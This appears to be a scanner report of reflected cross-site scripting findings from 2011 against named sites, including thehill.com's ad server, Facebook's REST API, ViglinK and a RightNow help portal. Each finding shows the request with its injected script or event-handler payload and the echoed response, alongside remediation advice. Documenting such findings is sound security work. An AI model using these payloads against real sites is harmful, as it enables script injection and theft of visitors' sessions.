Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:17 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4484

var MAX_b295a9fa = '';
MAX_b295a9fa += "<"+"div id=\"MAX_b295a9fa\" style=\"position:absolute; width:306px; height:267px; z-index:99; left: 0px; top: 0px; visibility: hidden\">\n";
MAX_b295a9fa += "<"
...[SNIP]...
cumentElement.scrollTop;
       of = 0;
   }
   else
   {
       sl = window.pageXOffset;
       st = window.pageYOffset;

       if (window.opera)
           of = 0;
       else
           of = 16;
   }

        c[_s].left = parseInt(sl+(iw - 306) / 2 +066993;alert(1)//766c94fef6e) + (window.opera?'':'px');
        c[_s].top = parseInt(st+(ih - 267) / 2 +0) + (window.opera?'':'px');

   c[_s].visibility = MAX_adlayers_visible_b295a9fa;
}


function MAX_simplepop_b295a9fa(what)
{
   var
...[SNIP]...

2.2. http://ad.thehill.com/www/delivery/al.php [shiftv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/al.php

Issue detail

The value of the shiftv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7de03%3balert(1)//1688d5789ce was submitted in the shiftv parameter. This input was echoed as 7de03;alert(1)//1688d5789ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=0&shiftv=07de03%3balert(1)//1688d5789ce&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:12 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:12 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4484

var MAX_fedee667 = '';
MAX_fedee667 += "<"+"div id=\"MAX_fedee667\" style=\"position:absolute; width:306px; height:267px; z-index:99; left: 0px; top: 0px; visibility: hidden\">\n";
MAX_fedee667 += "<"
...[SNIP]...
;
       st = window.pageYOffset;

       if (window.opera)
           of = 0;
       else
           of = 16;
   }

        c[_s].left = parseInt(sl+(iw - 306) / 2 +0) + (window.opera?'':'px');
        c[_s].top = parseInt(st+(ih - 267) / 2 +07de03;alert(1)//1688d5789ce) + (window.opera?'':'px');

   c[_s].visibility = MAX_adlayers_visible_fedee667;
}


function MAX_simplepop_fedee667(what)
{
   var c = MAX_findObj('MAX_fedee667');

   if (!c)
       return false;

   if (c.style
...[SNIP]...

2.3. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc was submitted in the method parameter. This input was echoed as 6c818<img src=a onerror=alert(1)>15cd25761cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Thu, 03 Feb 2011 01:33:00 GMT
Content-Length: 427

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats6c818<img src=a onerror=alert(1)>15cd25761cc"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]"},{"key":"format","value":"json"},{"key":"callba
...[SNIP]...

2.4. http://api.facebook.com/restserver.php [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5 was submitted in the urls parameter. This input was echoed as 7250b<img src=a onerror=alert(1)>3afeaa161d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Wed, 02 Feb 2011 17:35:11 -0800
Pragma:
X-Cnection: close
Date: Thu, 03 Feb 2011 01:33:11 GMT
Content-Length: 443

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]7250b<img src=a onerror=alert(1)>3afeaa161d5"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

2.5. http://api.viglink.com/api/click [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 9ff8c<script>alert(1)</script>d0cbfd0ba59 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/click?format=jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/plain
Date: Wed, 02 Feb 2011 23:58:36 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 71
Connection: keep-alive

Unrecognized format: 'jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59'

2.6. http://api.viglink.com/api/click [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the jsonp request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7c41%3balert(1)//89d5419dbd6 was submitted in the jsonp parameter. This input was echoed as e7c41;alert(1)//89d5419dbd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491e7c41%3balert(1)//89d5419dbd6 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:43 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 102
Connection: keep-alive

vglnk_jsonp_12966856382491e7c41;alert(1)//89d5419dbd6('http://www.invisionpower.com/products/nexus/');

2.7. http://api.viglink.com/api/click [out parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the out request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875ad'%3balert(1)//6f691d8d147 was submitted in the out parameter. This input was echoed as 875ad';alert(1)//6f691d8d147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F875ad'%3balert(1)//6f691d8d147&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:38 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 103
Connection: keep-alive

vglnk_jsonp_12966856382491('http://www.invisionpower.com/products/nexus/875ad';alert(1)//6f691d8d147');

2.8. http://api.viglink.com/api/click [out parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the out request parameter is copied into the HTML document as plain text between tags. The payload 89bf8<script>alert(1)</script>0d35527ef71 was submitted in the out parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=89bf8<script>alert(1)</script>0d35527ef71&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:41 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 72
Connection: keep-alive

vglnk_jsonp_12966856382491('89bf8<script>alert(1)</script>0d35527ef71');

2.9. http://api.viglink.com/api/ping [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 4b46b<script>alert(1)</script>e43aee83162 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966856066450 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 02 Feb 2011 22:26:57 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 97

error: Unknown api key: 4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162

2.10. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e41</script><script>alert(1)</script>a2217655438 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438= HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:42:03 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUx6oW8tRuC50eDPRl97npFuaGOMHZn11NBeN10rkeSZPQgfvVRx_vSuEVGvGk0mz1YIl66klbzDAz4DZ182Z1g2kuAlaPwudchWaGV0lrblKY0vtyrTDDdJ79GQdJGzc8AyEa7pPjYaY2Zu0yuUACJsF%7EJtE%7EioMbnns6N4y50a8cshftqy6qCLau3o8Zwemiu0KpfY0iRiilrQMFwJWssTx%7EYINE1554YiykSPZP7F0IBDazYu6U3ycZMVMfr0QLbP5KPEGQ_vEeZLeda09%7EVPWRykFc8y_ukjAbGNAMFht1JGBgjah0G2TUgQ0nSW75STNcK4H4AQoYJV7UCGSR79sTFZIQONMSPahHDaYJfXgZKzZxTmdV_GJ8hU5tlHR04ytmnxPNqwFRehwSL0RTPnZG3thL%7EVHjHZV56Eb_V85eqHkXObQD0Zm0p10961KoojryKWDSFgzM2niBSNac0fLu7K4LulL54z_WGQJduoFwvteqHRIwoYdAobOou2EW%7ExQ4oFScfPE%21; path=/; httponly
RNT-Time: D=118859 t=1296697323108634
RNT-Machine: 01
F5_do_compression: yes
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438=');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT_HIERMENU":9,"EUF_DT_INT":5,"EUF_DT_MEMO
...[SNIP]...

2.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3aa72</script><script>alert(1)</script>2ea59d67104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1 HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:08 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUgRprfxgIlvq96duxnob3hvBaWfagsAGz590%7E%7EFQxYvj6_1w_6mEciwlljmE7zfJtLqRlvR8xervxxoGDYYqCbw4kPUBcZEFoZRmrZw8QTqh4Q3urBb47qoF3Tui%7EDMuuA8SW6x111R8MaPvDpqWLDXbH2fjE%7EjAQJy%7EjpssYasVZ6HH79id9iSiVkOhJWhsMfM4PF1Frjy3wyBiwGBVx8ENPxA2o1dJ0ebJPuv5%7EJLSu504MoxpXxUSQUXU%7EseRXqvR9FJr7oB15DwsOl4WjzTn0NPd0rGO3Fas0MnPCVz9jhd8VYKFNvqPkw9jFjGI5RxmfMPs1cmyuG3nobRb1T%7EEeNs7LFMydaVYBQOOEVJ6jaF1Re9n%7EAnssEQJc50mpLkTRawP6ipl92XTouSftSuWnhiHv2QavJLs2kQPIo4CwPpvMympk9qYSFcWtVh1AzWTOSuaIE967DBi4q0x4h7xmtPl28r4A2IvoxYQCn8Q6%7E7%7EmD%7E3OVgp4HNwqM%7EBqbGGyF1_k2hY%21; path=/; httponly
RNT-Time: D=104396 t=1296697268034941
RNT-Machine: 06
F5_do_compression: yes
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT_HIERMENU":9,"EUF_DT_INT":5,"EUF_DT_MEM
...[SNIP]...

2.12. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload 607f7<script>alert(1)</script>42eba27e39e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000002)%3C/script%3E607f7<script>alert(1)</script>42eba27e39e HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: arbor.custhelp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:10 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUAaKWBZ7SvvLxWfp%7EcIQfh7mPnrXi9vTZtK7WkhczqL64yYHQ0QVbkK9RHgawNIjpSCmM0Aeaz122bTrt9oxrYqquIIWDHxoUwafbHRYXpZAj8zBo%7EGLua8qDJQ%7EDYr_BEjDeAjfYtPNjYUGrMUjxkR8PpaOpu3f89vemdlgHGnpoJdFLQxsk675FBV9YqReWb3GFGXX4XBah%7EsnYmD_7SyBdqQzd3Zhql7OBAN1jNOgrekoiQBj_XTw6WLuYQmIdNS_1rGasg88i67O%7E9NukjSidUHv2Jl6I7jQxN%7EqKfSPkOD4ngpoXsEKphUlebl6j_XbSJbRExJ716aGgyN_ZtzCyzQ80dbPwgc7f72dHNu4lA3QTPUPqrVQ5_GsqIpIuQPssVxGn6wl0x3yl1rK6szqG50WB0gAY0_rSruLJlE4Xu%7EmXXJ1_cw%21%21; path=/; httponly
RNT-Time: D=108020 t=1296697270345051
RNT-Machine: 03
F5_do_compression: yes
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
